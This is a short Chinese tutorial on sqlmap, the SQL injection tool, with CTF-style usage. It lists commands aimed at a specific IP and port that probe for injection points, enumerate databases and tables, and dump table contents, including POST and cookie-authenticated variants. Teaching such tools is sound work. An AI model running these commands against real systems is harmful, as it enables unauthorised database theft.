Sqlmap 介绍

Sqlmap 是检测服务端是否存在SQL注入漏洞的自动化工具。因为其强大的检测能力，常用在CTF比赛的SQL注入类型的题目中。它的主要功能是扫描、发现并利用指定URL中的SQL注入漏洞，支持的数据库类型非常多。

安装

在 macOS 中，可以通过 brew install sqlmap 安装并通过命令行使用。

想知道 brew 怎么使用，可以参考 Homebrew 介绍与上手指南

使用

sqlmap 常用命令及参数如下：

# 检测指定 URL 的注入点情况
$ sqlmap -u http://223.112.5.156:59050/index.php\?id\=1
# 检测指定 URL 的注入点情况，并指定更多的参数，提高成功率
$ sqlmap -u http://223.112.5.156:59050/index.php\?id\=1 --level 2 --time-sec=10
# 指定注入点，查看当前数据库
$ sqlmap -u http://223.112.5.156:59050/index.php\?id\=1 --current-db
# 指定注入点，指定数据库名，查看数据库中所有表
$ sqlmap -u http://223.112.5.156:59050/index.php\?id\=1 -D cyber --tables
# 指定注入点，指定数据库名和表名，查看表中具体内容
$ sqlmap -u http://223.112.5.156:59050/index.php\?id\=1 -D cyber -T cyber --dump

# 利用 POST 参数进行探测, 使用 --data 方式指定参数
$ sqlmap -u http://223.112.5.156:59050/ --data="usr=admin&pass=admin"  --current-db

# 当网站需要认证时，需要带上 Cookie ，可以利用 --cookie 参数
$ sqlmap -u http://223.112.5.156:59050/index.php\?module\=index\&do\=member\&uid\=5  --level 2 --time-sec=10 --cookie "user=b73565ee4c6fd8009b9226e76d691d06; PHPSESSID=o5psg7sv53froq22u789dggbp0"

参考资料

1. sqlmap
2. sqlmap简介及简单应用实例